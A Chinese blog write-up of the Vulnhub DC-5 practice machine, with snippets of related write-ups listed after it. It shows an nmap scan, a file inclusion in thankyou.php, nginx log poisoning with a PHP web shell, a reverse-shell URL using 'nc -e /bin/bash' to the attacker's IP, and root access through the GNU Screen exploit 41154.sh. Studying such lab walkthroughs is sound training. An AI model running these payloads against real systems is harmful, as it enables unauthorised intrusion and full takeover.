渗透测试学习之靶机DC-5

最新推荐文章于 2024-07-25 11:08:08 发布
最新推荐文章于 2024-07-25 11:08:08 发布
阅读量361 收藏 3
点赞数 1
分类专栏: 靶机 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/104817664
版权
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.142
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.142
    在这里插入图片描述
  • web站点相关服务信息
    在这里插入图片描述
  • 目录信息
    在这里插入图片描述
    看到footer.php,这个页面在前面点站点功能的时候没有看到…
    在这里插入图片描述在这里插入图片描述
    这是每个页面末尾的标注,并且每访问一次都会随机变换,发现其他页面刷新并不会变换,但是thankyou.php也会随机变换。
    在这里插入图片描述在这里插入图片描述
    应该是thankyou.php调用了footer.php,即thankyou.php可能包含了footer.php。
3. 文件包含getshell
  • 测试
    抓包后,url后增加?file=/etc/passwd,放,查看响应包:
    在这里插入图片描述
    到这发现文件包含了,参考大佬文章如何进行下一步操作知道:GET请求目标后会在日志文件中记录,可以将一句话写在请求的URL后,下图角标处(即替换/phpinfo.php),这样访问日志文件可以将一句话读取出来:
    (图中是使用phpstudy中查看nginx的配置文件信息)
    在这里插入图片描述
  • 写入一句话
    <?php system($_GET['cmd']); ?>
    在这里插入图片描述
    access.log文件较大,在var/log/nginx/error.log下没有发现错误请求信息,说明已经写入了access.log。
    在这里插入图片描述
  • 反弹shell
    在kali上监听8888端口,然后访问此url:
    http://192.168.246.142/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.246.138 8888
    在这里插入图片描述
    获取交互式shell:
    python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述
4.提权

查找符合条件的文件:
find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
使用searchsploit查找响应漏洞:
searchsploit screen
在这里插入图片描述
cat /usr/share/exploitdb/exploits/linux/local/41154.sh
在这里插入图片描述
按照教程走就行:
在这里插入图片描述
得到了两个文件libhax.so和rootshell后,把它们上传到靶机里。
使用scp命令获取kali里的这两个文件,前提需要配置开启kali的ssh服务:
scp root@192.168.246.138:/tmp/libhax.so /tmp/
scp root@192.168.246.138:/tmp/rootshell /tmp/
在这里插入图片描述
成功上传到靶机里:
在这里插入图片描述
继续按照41154.sh的教程就行:
在这里插入图片描述
进入root目录,得到thisistheflag.txt:
在这里插入图片描述

总结
wxlblh
关注
专栏目录
DC5-靶机
Au
08-29 2199
下载地址 作者已经做了一个提示视频,地址 配置的环境: kali:192.168.25.131 DC5-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.135,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1...
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
渗透测试学习靶机DC-4
情感博主V
03-11 322
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.141 2. 信息搜集 端口信息 web站点的相关服务信息 登录页面: 目录信息 使用dirbuster: login.php和logout.php也会跳转到index.php这个登录页面。 ...
DC-5靶机通关
最新发布
qq_63831588的博客
07-25 561
到这里我们只是可以查看文件而已,并不能上传文件,比如我写点代码什么之类的传上去,我们的最终目的是能够远程控制这台服务器,所以到这里我就又迷茫了,搜了一下教程以后知道了这么个东西,叫做日志文件,就是虽然我们不能够直接往里写东西,但是我们可以去请求一些东西,通过请求把我们的一些代码记录在那个日志文件中,然后我们利用文件包含漏洞引用一下这个日志文件,他就可以把里面的代码执行,这样的话不是就达到我们的目的了吗?找这个玩意儿的方式有很多,我这里用bp,当然wfuzz等等也是可以的,它的原理其实就是爆破!
DC5靶机
qq_40646572的博客
05-04 357
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
DC-5靶机
mlws1900的博客
03-25 838
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
【VulnHub系列】DC-5靶机
薛定谔嘚喵博客
03-10 285
DC-5靶机
Vulnhub靶机 DC-5
菜浪马废的博客
03-30 278
先找到靶机 然后扫一下 nmap -sP 192.168.0.0/24 nmap -sV 192.168.0.149 发现底下的年份一直再变,怀疑文件包含漏洞 写个phpinfo试一下 返回phpinfo页面 成功 <?php phpinfo();?> 监听端口 nc建立连接 nc -nlvp 4444 /thankyou.php?file=/var/log/ngi...
vulnhub之DC5靶机
LainWith的博客
08-15 622
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
【vulnhub】---DC-5靶机
qq_43168364的博客
08-21 420
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-5靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 收集到的相关信息: *
vulnhub-DC5靶机
qq_63261741的博客
08-23 94
dc5靶机
DC靶机系列:DC-5
Ays.Ie的博客
02-27 436
本篇文章为DC系列第5个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
067 渗透测试实战,靶机 DC-5
鸡蛋炒鸡蛋
05-27 1446
文章目录一:环境准备二:nmap扫描三:御剑扫描网站 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 需要抓包软件bp,文件的下载安装可以参考我的 前面的内容 :047 Burp Suite的详细安装与使用 打开DC-5,建议把虚拟机升级到15.5.7,我之前的虚拟机做这个dc靶机实验的时候经常电脑蓝屏。   二:nmap扫描 扫描局域网主机号 nmap -sP 192.168.100.0/24 -oN nmap.sP 扫描端口号 nmap
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值